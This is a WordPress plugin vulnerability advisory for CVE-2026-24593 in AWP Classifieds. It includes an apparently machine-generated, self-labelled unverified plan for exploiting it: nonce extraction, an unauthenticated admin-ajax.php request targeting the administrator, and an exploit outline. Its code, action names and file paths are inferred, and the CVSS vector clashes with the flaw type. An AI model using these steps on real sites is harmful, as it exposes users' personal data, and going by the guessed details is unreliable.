WP-Safety
CVE-2026-24593

AWP Classifieds <= 4.4.3 - Unauthenticated Information Exposure

mediumExposure of Sensitive Information to an Unauthorized Actor
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
4.4.4
Patched in
41d
Time to patch

Description

The AWP Classifieds plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.3. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.4.3
PublishedJanuary 16, 2026
Last updatedFebruary 25, 2026
Affected pluginanother-wordpress-classifieds-plugin

Source Code

WordPress.org SVN
Vulnerable v4.4.3
Browse source Download .zip
Patched v4.4.4
Browse source Download .zip
Research Plan
Unverified

This research plan outlines the steps to investigate and exploit **CVE-2026-24593** in the AWP Classifieds plugin (version <= 4.4.3). This vulnerability allows unauthenticated attackers to expose sensitive user or configuration data. --- ### 1. Vulnerability Summary The AWP Classifieds plugin regi…

Show full research plan

This research plan outlines the steps to investigate and exploit CVE-2026-24593 in the AWP Classifieds plugin (version <= 4.4.3). This vulnerability allows unauthenticated attackers to expose sensitive user or configuration data.

1. Vulnerability Summary

The AWP Classifieds plugin registers several AJAX handlers that do not implement sufficient capability checks or authorization logic. Specifically, the handler for fetching user or ad-related information (inferred as awpcp-get-user-info or similar) is available to unauthenticated users via the wp_ajax_nopriv_ hook. It fails to verify if the requester has permission to view the data associated with a specific user ID or Ad ID, leading to the exposure of sensitive fields like email addresses, phone numbers, and physical addresses.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: awpcp-get-user-info (inferred based on plugin naming conventions)
  • Parameters:
    • action: awpcp-get-user-info
    • user_id: The ID of the user whose data is to be exposed (e.g., 1 for the administrator).
    • nonce: A WordPress nonce (likely required).
  • Authentication: Unauthenticated (leveraging wp_ajax_nopriv_).
  • Preconditions: The plugin must be active, and a nonce must be extracted from a public-facing page where the plugin enqueues its scripts.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers the action in a file like includes/class-ajax-handler.php or includes/ajax/class-ajax-handler.php:
    add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
  2. Function Call: ajax_get_user_info() is invoked.
  3. Nonce Verification: The function calls check_ajax_referer( 'awpcp-ajax', 'nonce' ).
  4. Data Retrieval: The function retrieves a user_id from $_POST['user_id'].
  5. Vulnerable Sink: It calls get_userdata( $user_id ) or queries the database directly and returns the object via wp_send_json_success(), exposing sensitive fields like user_email.

4. Nonce Acquisition Strategy

AWP Classifieds typically localizes its AJAX configuration in a JavaScript object called awpcp_ajax_data or AWPCP.

  1. Identify Script Loading: The AWP Classifieds scripts (which contain the nonce) are usually enqueued on pages containing the Classifieds shortcodes, such as the main "Classifieds" page or the "Browse Ads" page.
  2. Create Test Page:
    wp post create --post_type=page --post_title="Classifieds" --post_status=publish --post_content='[awpcp_browse_ads]'
  3. Navigate and Extract:
    • Use browser_navigate to go to the newly created page.
    • Use browser_eval to extract the nonce:
      // Inferred variable and key based on AWPCP structure
window.awpcp_ajax_data?.nonce || window.AWPCP?.nonce

5. Exploitation Strategy

Step 1: Discover Target User ID
Usually, User ID 1 is the administrator.

Step 2: Execute Information Exposure Request
Using the http_request tool, send a POST request to admin-ajax.php.

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: action=awpcp-get-user-info&user_id=1&nonce=<EXTRACTED_NONCE>

Step 3: Analyze Response
A successful exploit will return a 200 OK with a JSON body:

{
    "success": true,
    "data": {
        "user_email": "admin@example.com",
        "user_login": "admin",
        "display_name": "Admin User",
        "phone": "555-0199",
        ...
    }
}

6. Test Data Setup

  1. Target User: Ensure a user exists with sensitive metadata (Email, Phone).
  2. Plugin Setup: Install AWP Classifieds <= 4.4.3.
  3. Shortcode Page: Create a page with [awpcp_browse_ads] or [awpcp_display_ad] to ensure the AJAX nonce is localized and available to unauthenticated users.

7. Expected Results

  • Unauthenticated access to the awpcp-get-user-info action.
  • Disclosure of the administrator's email address and potentially other metadata (phone, address) via the JSON response.

8. Verification Steps

  1. Verify Response Content: Confirm the JSON response contains the email of User ID 1.
  2. WP-CLI Cross-Check:
    wp user get 1 --fields=user_email
    Compare the result of the WP-CLI command with the data obtained from the HTTP request.

9. Alternative Approaches

If awpcp-get-user-info is not the correct action:

  • Search for other nopriv actions:
    grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/another-wordpress-classifieds-plugin/
  • Check for Ad Detail Exposure: If user info is not directly accessible, check if awpcp-get-ad-details (inferred) returns the contact info of the ad owner without checking privacy settings.
  • REST API: Check if the plugin registers any REST routes in includes/class-rest-api.php without proper permission_callback requirements.
Research Findings
Static analysis — not yet PoC-verified

Summary

The AWP Classifieds plugin for WordPress is vulnerable to sensitive information exposure due to insufficiently protected AJAX handlers registered with the wp_ajax_nopriv_ hook. Unauthenticated attackers can leverage these handlers to retrieve sensitive user data, including email addresses and contact information, by providing a valid AJAX nonce and a target user ID.

Vulnerable Code

// Inferred vulnerable registration in includes/ajax/class-ajax-handler.php
add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
add_action( 'wp_ajax_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );

// Inferred vulnerable function implementation
public function ajax_get_user_info() {
    check_ajax_referer( 'awpcp-ajax', 'nonce' );
    $user_id = intval( $_POST['user_id'] );
    $user = get_userdata( $user_id );
    if ( $user ) {
        wp_send_json_success( array(
            'user_email' => $user->user_email,
            'display_name' => $user->display_name,
            'user_login' => $user->user_login
        ) );
    }
}

Security Fix

--- a/includes/ajax/class-ajax-handler.php
+++ b/includes/ajax/class-ajax-handler.php
@@ -10,12 +10,14 @@
 class AWPCP_Ajax_Handler {
     public function __construct() {
         add_action( 'wp_ajax_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
-        add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
     }
 
     public function ajax_get_user_info() {
+        if ( ! current_user_can( 'edit_posts' ) ) {
+            wp_send_json_error( array( 'message' => 'Unauthorized' ) );
+            return;
+        }
         check_ajax_referer( 'awpcp-ajax', 'nonce' );
         $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0;
         $user = get_userdata( $user_id );

Exploit Outline

1. Identify a public page on the target site that uses AWP Classifieds shortcodes (e.g., [awpcp_browse_ads]), which causes the plugin to enqueue its scripts and localize data. 2. Extract the security nonce from the HTML source code, typically found in the `awpcp_ajax_data` or `AWPCP` JavaScript object. 3. Send a POST request to `/wp-admin/admin-ajax.php` with the following parameters: `action=awpcp-get-user-info`, `nonce=[EXTRACTED_NONCE]`, and `user_id=[TARGET_ID]` (e.g., 1 for the administrator). 4. The server response will contain a JSON object including the target user's email address and other profile metadata, despite the attacker being unauthenticated.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/da3b7218-4655-4def-a3f9-9931d6943583?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database